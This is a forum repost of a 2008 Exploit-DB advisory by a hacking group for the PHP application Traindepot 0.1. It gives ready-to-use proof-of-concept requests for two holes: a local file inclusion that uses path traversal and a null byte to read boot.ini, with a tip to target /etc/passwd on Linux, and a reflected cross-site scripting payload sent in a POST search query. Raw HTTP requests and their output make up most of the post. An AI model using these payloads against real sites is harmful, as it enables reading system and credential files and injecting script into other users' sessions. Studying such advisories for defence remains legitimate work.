Exploit traindepot 0.1 - Local File Inclusion / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5848
Проверка EDB
  1. Пройдено
Автор
CWH UNDERGROUND
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2839 cve-2008-2838
Дата публикации
2008-06-18
Код:
============================================================
  Traindepot 0.1 (LFI/XSS) Multiple Remote Vulnerabilities
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 18 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Traindepot
 VERSION     : 0.1
 VENDOR	     : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/traindepot
#####################################################

--- Local File Inclusion ---

-------------
 Exploit
-------------

[+] http://[Target]/[Traindepot_path]/index.php?module=[LFI]

-------------
 POC Exploit
-------------

[+] GET http://192.168.24.25/traindepot/index.php?module=../../../../../../../../boot.ini%00 HTTP/1.1
[+] Accept: */*
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Cookie: PHPSESSID=3954bc593bfbf164295dfabbe2459187
   
 
    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS.


--- Remote XSS (query) ---

[+] http://[Target]/[Traindepot_path]/index.php?module=search

---------------------------
 POC Exploit [POST Method]
---------------------------

[+] POST http://192.168.24.25/traindepot/index.php?module=search HTTP/1.1
[+] Accept: */*
[+] Content-Type: application/x-www-form-urlencoded
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Content-Length: 70
[+] Cookie: PHPSESSID=3954bc593bfbf164295dfabbe2459187

[+] query=<script>alert(123);</script>&search=%3F


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-18]
 
Источник
www.exploit-db.com

Похожие темы